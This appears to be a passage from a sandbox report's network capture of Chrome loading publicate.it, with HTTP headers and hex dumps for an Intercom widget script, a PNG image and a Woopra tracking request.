                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 72 3a c1 c9 32 07 4e f1 02 e9 c4 61 1e 98 f0 5b 04 2a e9 24 49 b8 c2 d2 b2 7a f1 7c f1 d5 8f 80 90 0a fe ca 92 89 f4 a8 40 61 14 f7 46 65 e9 af d6 9f 7e 0b e3 63 00 bf 09 fe 9e a5 51 b5 f0 b3 f3 e0 e3 72 98 54 01 6b d1 03 4a 0e 11 b7 81 3f b8 b5 f0 80 20 a7 09 14 0e 2c cb 01 49 e4 05 96 0d 79 11 21 b6 ea 85 44 22 9f eb 65 d6 ea ed 78 b1 a9 65 0b 8a 96 ed b3 99 6c d9 ef 07 a0 b5 84 56 ea 2d 50 5e e4 ed 16 b2 9d 60 08 8a 4b 2b 29 2d 4f 0b 95 74 6c 35 b5 96 d6 b4 2a 6d f3 52 91 76 ab 23 fb f9 1e cd 71 52 00 94 1f 7b 1e 4e e7 58 b4 87 bc 5e 5c ed 30 ff e2 fc a8 91 fc 1b e9 b5 d7 48 a4 50 14 d2 19 5a 42 88 88 a6 aa f9 4c 53 4a 6a 8a a2 35 84 e5 f6 77 53 52 52 c9 97 5b e9 0a 5d 4b 26 5a ad 44 c7 53 eb 64 d7 4a 39 28 2b 78 e5 a0 ca d1 3c 13 0a 8b 32 a7 f2 42 48
                                                                                                                                                                                                        Data Ascii: r:2Na[*$Iz|@aFe~cQrTkJ? ,Iy!D"exelV-P^`K+)-Otl5*mRv#qR{NX^\0HPZBLSJj5wSRR[]K&ZDSdJ9(+x<2BH
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: c3 88 ab 79 60 83 20 bc 4e c8 a4 98 46 63 d8 96 81 df d9 03 1e ba 17 71 3a e7 45 9c cc d0 6c 94 e6 90 4d 8a 67 13 8a 96 17 84 8c d2 f7 51 44 a8 99 ad d4 5b 92 90 d7 62 1c e9 27 d9 4c 5a d3 1a 34 e9 a2 a6 f9 bc 56 69 ae c8 c1 4c b6 59 51 e2 7a 31 5b 62 d9 cc 5a 22 91 68 f1 2b 85 36 bf 20 c6 e2 ac 5f 06 76 38 b6 d2 88 43 90 c3 70 9a 8b f9 a6 f8 cf 67 14 0c a0 1f 98 f9 04 bc 70 a8 16 e2 8a 81 03 f4 64 9c 20 3a b0 e1 7f 2d 3d f4 ff c6 74 a9 a1 f6 af 77 fa 8d ca 24 ac 5f 0b 2e 62 fc f6 17 66 a3 0e ad ea 35 9f cf ac 62 e0 e8 ea 26 ba 01 64 d8 48 12 7c f0 1a 24 85 09 5d a0 25 c4 71 90 78 99 f6 20 9c ef 1e e3 e1 0c b7 6a 84 20 82 80 b4 a4 ae 8a 12 f2 a9 34 2b fa 6c a1 20 2f 4b 8c 10 f6 12 62 35 9d af 26 b2 b9 60 29 db f5 53 44 30 53 4a 56 f2 4c af 94 88 50 35 8a
                                                                                                                                                                                                        Data Ascii: y` NFcq:ElMgQD[b'LZ4ViLYQz1[bZ"h+6 _v8Cpgpd :-=tw$_.bf5b&dH|$]%qx j 4+l /Kb5&`)SD0SJVLP5
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: e1 b8 df 03 f3 14 0c 4f ed fc c5 65 3c 12 07 53 48 07 d4 d7 c1 fe 68 ec dd 58 80 8a 4d 38 29 3d 40 85 e9 a8 c0 21 42 8d e5 33 85 4c b4 58 4f 27 b4 c4 0a 8a 24 4a 51 a1 52 88 44 0a 4a df 93 ab e7 93 85 06 b3 c0 b7 d7 80 59 08 69 6e 9e d5 43 34 cf d7 42 6a 18 ea 1b 3a 2d b0 ac 20 07 44 55 90 09 e4 ec b6 52 c9 88 40 51 b2 cc 91 46 61 15 61 cc cc be ab 11 49 01 0f 77 20 3c c0 3e ac 85 a5 90 ce d1 dd a2 4e c7 aa d5 4a 26 19 40 36 26 95 6f e5 fc 72 ae a8 22 3d 14 e0 80 fe 6a 5b c7 31 34 7d bd 41 cd 16 0f 6f c2 7d dc cb 98 da 97 1c 52 fb 96 76 e3 19 0e b7 05 ff af 68 e9 f9 5a 41 bf 75 d2 d5 d0 19 35 87 e2 e0 90 cc 34 e1 b9 e8 27 ab cb 7a cd 8f 79 0a 50 69 c0 0d 00 03 ef 6c e8 11 e1 bf c6 45 f3 49 6c b1 28 e8 42 3c 25 e4 2a 99 08 42 7e 36 b3 56 ca a7 c4 6e b6 be
                                                                                                                                                                                                        Data Ascii: Oe<SHhXM8)=@!B3LXO'$JQRDJYinC4Bj:- DUR@QFaaIw <>NJ&@6&or"=j[14}Ao}RvhZAu54'zyPilEIl(B<%*B~6Vn


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        136192.168.2.54992418.239.83.714436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC529OUTGET /widget/cirlxq0d HTTP/1.1
                                                                                                                                                                                                        Host: widget.intercom.io
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:29 UTC728INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                        Content-Length: 2666
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:29 GMT
                                                                                                                                                                                                        Last-Modified: Fri, 30 Aug 2024 16:11:39 GMT
                                                                                                                                                                                                        ETag: "79e0f7a4501bc79dbd676680491c8929"
                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                        Cache-Control: max-age=300, s-maxage=300, public
                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                        x-amz-version-id: vOA4_cNch4D_lr80yYCWWsT3S7yJgchq
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                        X-Cache: Error from cloudfront
                                                                                                                                                                                                        Via: 1.1 97f993f9d41d16f3f36b8c466857e2d6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        X-Amz-Cf-Id: xE2go3kgbz3kKS2ruYIbZ7AuftzuJ5V8_zm7kW3knhqHN_cFGY-s8Q==
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                        2024-08-30 16:16:29 UTC2666INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 59 0b 73 d3 3a 16 fe 2b 8e 77 27 b5 a7 8e 93 94 42 21 c5 b0 a5 94 a5 b3 94 76 08 73 f7 ee 94 6e 46 b1 95 44 e0 48 be b2 d2 34 37 c9 7f df 4f f2 23 76 92 16 ee cc 32 d0 da 47 e7 a5 a3 f3 f8 64 1a a3 19 0f 15 13 dc 71 97 f7 44 5a 34 58 9e bc e8 1e 77 7b 25 9d ba 4b ea d3 87 44 48 95 06 cb 54 cc 64 48 07 53 92 f4 ec 09 8b 22 ca 5b 19 a9 05 92 ed 91 84 0d 86 24 a5 58 54 2a 49 7b ed 36 28 2d 46 a6 3e e3 8a ca 50 e0 41 d8 5e 32 1b c6 2c 1c 24 44 4d 36 9c df d3 92 29 8c b8 8f 5f 6d db 4b 27 94 aa 74 90 48 f1 b0 d8 e2 2f 98 5b 19 8f 11 a8 b2 43 98 72 25 17 7b 85 e7 f3 79 69 ad 25 a9 de 1d e3 e3 4c 87 91 82 fa 88 3e f8 13 35 8d 6d 8f f1 54 91 38 1e 4c 45 44 77 f6 97 6c f6 86 7f a5 d5 28 e5 1b ae d1 b3 ce f3 88 be 78 15 92 f0 c5 31
                                                                                                                                                                                                        Data Ascii: Ys:+w'B!vsnFDH47O#v2GdqDZ4Xw{%KDHTdHS"[$XT*I{6(-F>PA^2,$DM6)_mK'tH/[Cr%{yi%L>5mT8LEDwl(x1


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        137192.168.2.549928104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC807OUTGET /images/template5-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC751INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:28 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 129281
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "1f901-620aa1d1b35a6"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKanErvK0i7zxKBn6%2BRWNvU%2FCntbbroGVS6ogM9F6y8fJOiDAjdZ3pALP5nzAFs4jIG7GwvKG9JFw%2BmaaM%2BPt6CS2dUSdYuOX8uMWL5C6wJCVyaRC40qJSe5pxSikA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615e13e4b1899-EWR
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC618INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 02 62 08 03 00 00 00 06 df c0 7b 00 00 03 00 50 4c 54 45 0a 0a 0a fd fe ff fc fc fc d2 c2 ba 62 61 61 dd 83 46 e5 cf ac 02 02 02 00 00 00 01 01 01 30 30 30 fe fe fe f5 f4 f4 f4 f3 f1 d9 62 21 d8 62 1f d9 61 20 d8 61 20 d8 62 20 d8 61 1e d7 61 1d fb fd fb da 60 1d fe ff fe d6 61 21 e6 e7 e5 e7 e9 e8 ea e9 e6 d8 5e 1b 17 16 14 d4 5e 1c fa f5 ef dc 5f 21 33 2d 29 eb ec ea f0 ee ea 3d 32 2b f9 f9 f5 3a 2b 25 d7 5c 17 d1 62 24 39 3c 32 40 42 37 dc dd d8 d4 63 1c f7 f1 ed 21 1a 15 4a 46 38 55 46 34 30 26 20 31 35 2e ea be a4 d0 6e 35 d7 96 6b 69 63 51 d2 67 2c d1 7e 49 d0 76 3e 5b 4e 3b d9 9e 75 28 20 1b e1 e1 dd 48 3c 2f 9e 52 1c f1 f4 f0 4c 4c 3e c3 c4 be dc 71 34 2f 1f 0f f3 df cc 47 30 27 56
                                                                                                                                                                                                        Data Ascii: PNGIHDRb{PLTEbaaF000b!ba a b aa`a!^^_!3-)=2+:+%\b$9<2@B7c!JF8UF40& 15.n5kicQg,~Iv>[N;u( H</RLL>q4/G0'V
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 46 10 b2 86 61 e6 de ce 6e 2c 0f df d3 c2 df ad 66 d7 83 2f bb b9 af cf 86 19 ec cc 96 99 92 82 7d 4e 30 e8 b9 6d cf 9f 75 89 84 77 bb 88 46 e9 93 45 8a 73 3c 9a 77 37 ed b6 97 7f 63 2e ee 91 13 f4 a4 59 3d 13 09 d6 a1 5b 51 19 0e a1 88 4a af 9c 80 c3 66 12 ac 46 1d 63 4a 22 75 53 22 ae a7 99 d7 cb b8 a0 9e 92 ca 91 75 ba 55 12 cf b8 7e b3 97 59 cb c3 b2 66 18 0e 8e 63 1b c6 a6 64 af b1 a8 f9 c2 8f 83 20 11 76 75 6b f9 b2 75 d5 c5 92 bc a6 74 be b1 9e 9f 28 12 c1 ad 8d b5 8c 2f d3 50 0f cb ba a5 b9 87 73 a6 77 1c 73 98 5d c0 9d 86 5e 7f 52 bb 2b 19 ea 33 12 85 ad 7b d8 61 e1 51 00 00 00 0e 74 52 4e 53 01 c0 bf 1d 0c fe fd 04 07 0b 11 d4 76 e4 4b c3 fd 64 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec bd bd
                                                                                                                                                                                                        Data Ascii: Fan,f/}N0muwFEs<w7c.Y=[QJfFcJ"uS"uU~Yfcd vukut(/Psws]^R+3{aQtRNSvKdpHYs IDATx
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 76 bb 5f 68 90 12 94 9f 6c 8b 80 8b a0 97 2c 16 29 98 eb 75 ac 3c a7 e6 39 ba 36 fe 07 0f f1 8e de fe 33 a4 ae 40 62 21 89 19 67 1e 2d 0f fb 3b 24 3a be 37 f3 1c 7c 44 3a 8b d6 02 71 ba 7d 0d c1 85 68 a4 01 5d 57 d8 63 c1 88 b5 49 aa d1 c5 e8 2e a7 34 b7 d7 6c 68 6a 65 0b 3f ff 75 fd 3d 2d 43 5c 3c cd a1 bd eb 43 aa db df 0f 44 a7 77 8d cc fe 51 54 7f f1 d5 b7 ed db 9f 3b 3e 5e c2 12 4d 00 70 85 24 1f 25 a9 0e 7c c1 98 d0 f9 fc e6 fe ed 5d 0c 3e 77 1c e1 30 26 a4 1f 8c e3 7c 34 1f ce 36 dd 4c fb 2c 54 4a 22 33 d1 43 d6 0c 40 6c 54 6f 7f b5 58 f5 04 f7 00 54 a8 cb 2a 7b b3 d9 bc 8b 03 e1 32 06 bd c5 52 0a d7 95 a8 a6 e8 38 4d a6 9b e1 ed cd fd 7c 3a fa fb db 59 bb d5 de 26 5a 29 01 2c f4 8b 4d 11 30 15 2c 92 6c b9 f4 97 f3 a9 41 9e 40 be 46 66 40 0e c7 bd
                                                                                                                                                                                                        Data Ascii: v_hl,)u<963@b!g-;$:7|D:q}h]WcI.4lhje?u=-C\<CDwQT;>^Mp$%|]>w0&|46L,TJ"3C@lToXT*{2R8M|:Y&Z),M0,lA@Ff@
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 24 2d 58 e4 87 c3 aa ad 57 a5 60 ae 94 6e 05 c9 f6 b2 30 55 29 7d bd cb 2e 7a 5c 38 9e 2b 23 10 02 40 0a 85 bf e3 a1 8a 94 2e b6 57 e8 92 89 a2 38 35 7e a8 dc de b2 54 55 5c f4 b8 90 9c 45 59 6e c8 62 03 70 8f d8 d5 ca e0 3d d3 71 56 5b 10 c8 b9 74 fc 88 e8 7b 21 61 6d 4d fb b4 96 f3 4f 38 9d 58 dc b2 ff fe ea 35 a7 1f ef e9 b4 db 7f 98 d3 1f 13 bd 7e 84 13 e3 ee 7d 9c 8e 02 e7 e8 01 1d ee 74 5e b7 7f ff e2 43 12 9e 36 f4 55 b1 45 cf 47 5c 95 c8 4c a1 49 d3 18 2a e4 63 2e 84 e2 e6 a7 2c c0 c7 61 1c ed aa 60 31 b9 8b 84 07 6e e4 31 55 55 b8 f5 e7 cb 90 36 78 56 85 bb fc fa 66 53 68 40 c9 40 1b ed f1 7b d2 6c 00 1a 06 32 f8 69 3b 4f 21 54 91 1c 64 78 01 f2 6b 00 48 a9 70 e3 46 4e 67 1c 65 40 ba 69 b7 66 6f 62 25 c6 59 11 fb dc 81 5e af 0a 55 9c 2f b9 00 2e
                                                                                                                                                                                                        Data Ascii: $-XW`n0U)}.z\8+#@.W85~TU\EYnbp=qV[t{!amMO8X5~}t^C6UEG\LI*c.,a`1n1UU6xVfSh@@{l2i;O!TdxkHpFNge@ifob%Y^U/.
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: dd b6 dd 46 e3 b9 8c 28 7a 80 7e 35 57 29 f3 d7 ee 4e 67 c5 ea fa 7a 92 a4 71 f6 66 ba a0 60 97 06 d2 f6 74 9a e4 46 84 2a 0c dd b2 82 bb ed ab eb 54 a3 8b 0d 8d bc e3 27 b2 7a 8f 2b aa 30 d9 4e 4c 19 69 28 55 29 7c 89 d9 19 45 81 04 17 10 04 26 cd f3 c5 40 29 88 fc 6c de 6e af 33 70 80 14 6f c1 c1 cf 0a 63 f2 18 c2 50 44 65 35 e8 0d 7c 2e fc 7c b3 32 18 ca 7f 8a 62 e4 1a a2 ad 11 27 f0 3c 83 d6 53 dd a8 70 4d 78 eb 3c 29 ea 20 fc 03 43 f4 11 41 6b 0b b1 b6 1d 1f c4 4e 1f 12 ba e1 0f 7b 27 32 14 6b 63 43 a0 b9 79 bc 1c cf 7b 6f 6b ef 27 ce b0 e7 39 fe 02 3d 34 e7 a9 8e 1f 7f fd 87 1f 50 cd 50 0c a2 48 80 c9 e7 57 18 cc 8a 4a 1b 66 e4 9c ab 4a e8 ee db bb c9 66 33 4d 16 3b cd ab 4e dc 9d e4 40 de 31 0e 00 ca f7 e3 74 29 70 f7 93 51 3c 1a de ae 17 a0 01 37
                                                                                                                                                                                                        Data Ascii: F(z~5W)Ngzqf`tF*T'z+0NLi(U)|E&@)ln3pocPDe5|.|2b'<SpMx<) CAkN{'2kcCy{ok'9=4PPHWJfJf3M;N@1t)pQ<7
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: ec 2b 05 40 93 73 9e e8 0e 7a db 8f 7d 6b b5 03 f4 98 aa 27 56 be 77 e6 f8 e0 6d 7d e4 a7 db 3b 79 4f 6e 69 85 7a 93 59 45 fb a0 10 96 c8 44 bc da c7 4d 33 45 e2 1c a5 4f b3 06 f0 7b 2b 12 48 24 51 6e a9 73 8e e8 d6 8f 48 44 b7 1e 7d 1b 9a 1d fc e3 6f 2f bf fe ea 3f 1e 13 fd 05 12 fd db 97 48 74 c6 c1 2c 7a 80 fa 97 70 41 2a 5d 6c ae 6e ee 87 db 55 aa 03 0c 66 29 0c 86 f9 28 b9 05 63 0a b7 71 1c 36 f2 ab fc c0 7c 3f 9d 5d f5 df 64 80 c1 b1 a7 38 ce 73 b8 2b 43 3d da 16 00 4e 18 04 8a 31 c1 85 eb 61 ce 2b c0 32 cd f3 14 c5 bd 50 12 78 74 d7 6f 6d 8b f8 fa 76 a5 05 57 71 de 13 51 2f 49 7d c1 7c 53 e4 41 9c 2c 7c 98 6c d7 9b 3c 88 8a 4d 02 e0 28 81 2a e6 59 3f ac 25 01 3b f5 ad d5 d3 77 f8 fe c1 b1 cd be 61 8f be af 99 eb 81 9f ee a1 53 97 de b6 76 0c d7 81
                                                                                                                                                                                                        Data Ascii: +@sz}k'Vwm};yOnizYEDM3EO{+H$QnsHD}o/?Ht,zpA*]lnUf)(cq6|?]d8s+C=N1a+2PxtomvWqQ/I}|SA,|l<M(*Y?%;waSv
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 2e b6 23 bd d8 dc 6f 2f 53 1f d7 1a 39 5d c8 1a e6 5f 28 cb 98 93 56 75 de c3 5d fb 77 4e bc f7 ef 49 75 7f bf 1f bf f6 a9 d5 79 d3 b5 c7 ee 78 4d d4 ff 6d 14 b9 fd e9 35 d1 8f 73 d1 9a 1f e0 c7 e7 89 fe e2 40 f4 20 2d e2 00 2b 44 23 cf 95 7e 27 30 e9 04 0b 88 42 06 26 19 de 4e 8b a4 db ed 26 39 b1 34 03 c7 01 51 8e 7f 9c b7 af 26 3b 8c 7a a3 fd c9 3d cf c5 fd 98 09 f7 e9 6d b5 2e 08 12 2c 0c 23 fd d3 26 09 38 94 4a a1 f0 f0 96 58 a1 5a 75 c6 f9 f4 a6 fd aa dd 9e a7 a0 30 90 63 ae d1 06 87 34 31 65 b4 58 80 22 8f b4 e3 b8 60 a6 9b 34 58 fc 70 73 9d ef 18 6a 9a 75 de db 63 a2 7f 06 a7 7b e7 d3 27 f6 69 b3 a7 71 ba 27 88 4e c6 5c a3 62 1e 59 7d a7 31 b3 3a 43 b2 e1 f4 9a 80 f8 83 ba 44 b6 2e a8 6b 14 b9 7d f6 fd 7e e3 a8 93 cc 31 48 51 2b 0d 07 a2 1f 53 1d
                                                                                                                                                                                                        Data Ascii: .#o/S9]_(Vu]wNIuyxMm5s@ -+D#~'0B&N&94Q&;z=m.,#&8JXZu0c41eX"`4Xpsjuc{'iq'N\bY}1:CD.k}~1HQ+S
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 58 14 56 b3 5b ac dd d3 6d 7a f5 07 38 7d 53 68 15 a2 91 8d a5 69 48 87 e4 32 0f 83 6c f5 7f 06 2a 8a b8 0a 8a bf 2e c7 05 52 bd aa c0 a6 86 ab 4a 05 26 5f cf 5a 57 f3 3b e3 93 70 a2 d4 ac 73 e2 fd 90 28 42 a9 06 8e c3 21 be de a4 94 2c 03 81 1c f4 16 84 4f 05 ac d2 f9 e6 66 64 7c 10 2a 64 4a 46 aa 0a 97 dd 0b 9f 41 ba 70 c9 90 88 22 b3 74 bc 52 75 b7 5d 60 91 a4 b5 4e 24 27 ff e6 13 e2 fd 9f 31 bc 5a 47 67 8f 89 8e d4 b1 2a 35 45 d5 ac 1c ac c5 78 ad bf e1 0c 1d c4 3b 5d a9 d6 ee 6a 40 14 9c df 03 d1 69 73 af d5 b9 c3 de d0 14 56 13 25 48 bc fb 1f d8 d3 b3 40 61 a9 39 c6 cf 80 a9 20 9e 4e 4c 28 4c d2 35 be c4 4c 97 7c d4 f3 f5 f7 9b d9 24 f6 2b 5a 5b 3a 92 42 40 60 8a f9 ab fb 7d 18 85 00 00 20 00 49 44 41 54 16 d6 a3 db 28 8d 8d f1 1f 89 c4 5a bc 1f b6
                                                                                                                                                                                                        Data Ascii: XV[mz8}ShiH2l*.RJ&_ZW;ps(B!,Ofd|*dJFAp"tRu]`N$'1ZGg*5Ex;]j@isV%H@a9 NL(L5L|$+Z[:B@`} IDAT(Z
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: ae d3 c0 e4 b9 51 ca 4f 0b 13 c9 b8 c8 02 97 61 15 c5 a0 37 88 20 f4 e3 74 c0 5d 3f 5b 5f a7 21 a6 7a 1c bb 80 4e ea b9 9b 9d ef dc 93 9c 1d 4d d5 ff 51 3c fa f8 a7 27 61 cb a7 0e f1 c5 d1 94 46 26 b4 71 47 ba 44 9d c9 44 84 22 fc cd c6 0d 8d 22 cf 75 dd 26 5c 40 f6 b5 dd b2 f0 73 e4 63 8b 38 6b 91 6d 85 4b ae 8e 06 76 96 12 cc ea f2 17 8b 88 87 fb e6 29 48 8a f3 0c 4e 0f 40 28 11 c0 c5 6a 8a 50 bf eb ae 56 52 85 22 0a c3 25 10 28 24 88 0a e1 86 22 69 26 57 c3 e9 08 cb d2 2f 96 68 39 a8 12 d3 e9 76 a3 59 fb 3a 93 92 31 79 a6 c4 61 9f 84 c2 1d 4f 32 40 ac 10 c9 01 b1 2e 74 80 70 25 20 a3 7c 7e 99 06 90 fd df 99 14 a1 b9 cb 41 46 d9 6b 23 5d 21 24 e7 83 9e 83 25 cd cb 5e 08 b0 c4 1c 77 0c c6 d6 fb 79 7d fd fa 3d 2d 7b 1c c5 a3 1f 82 37 b0 bd b2 d6 6c 9b cd
                                                                                                                                                                                                        Data Ascii: QOa7 t]?[_!zNMQ<'aF&qGDD""u&\@sc8kmKv)HN@(jPVR"%($"i&W/h9vY:1yaO2@.tp% |~AFk#]!$%^wy}=-{7l
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: dd bd cc 7d 3f 9e 5c 2f 02 33 ea 0f 87 c3 6b ac 2a 60 5c 2a 33 ea cf 86 fd 69 e6 96 d9 f5 ac df ff 9f 89 ae 30 27 0c ed 28 37 48 fa c3 fe 76 9a 63 81 e7 6a 38 ec f7 27 71 d0 fb 75 38 1c f6 31 0e 9a 4d fb c3 6d 37 c6 8d 55 9c f8 78 3f 4c 74 aa 8a 10 82 05 e9 6a 11 84 26 29 c6 54 e3 80 3a 46 a5 27 c3 04 f3 14 41 99 ee 5f 8d cf 84 e9 6e ba 46 0a 8c b3 a2 65 61 fd 6c e3 d1 ab 1b 44 e5 7d 08 a6 d3 64 7b d8 62 5b b5 bc bc 5e fa 21 48 df 24 85 c1 30 5b 3c 99 c4 20 23 b6 40 7c 09 a1 d3 0b 4c cb c2 7d 9c 0a 5e 84 2b 5c 44 08 8f a2 dd 68 4b 18 77 74 cb 47 e2 1d 97 df 01 50 e8 29 a2 f3 f7 13 bd f6 9d 9d 4d a5 fe 00 d1 d3 bb e9 ec ed 5d 0a 2a bd ec 4f ee de cd 87 a3 01 e6 76 39 00 51 b1 dd be b9 7b b3 dd 26 ba d2 58 af ab e2 eb cd c2 37 93 fe aa 58 f5 27 86 c0 51 4b
                                                                                                                                                                                                        Data Ascii: }?\/3k*`\*3i0'(7Hvcj8'qu81Mm7Ux?Ltj&)T:F'A_nFealD}d{b[^!H$0[< #@|L}^+\DhKwtGP)M]*Ov9Q{&X7X'QK


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        138192.168.2.5499315.9.73.804436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:29 UTC656OUTPOST /track/push/ HTTP/1.1
                                                                                                                                                                                                        Host: www.woopra.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 272
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywyjtjdpqcuMt4nQg
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://publicate.it
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
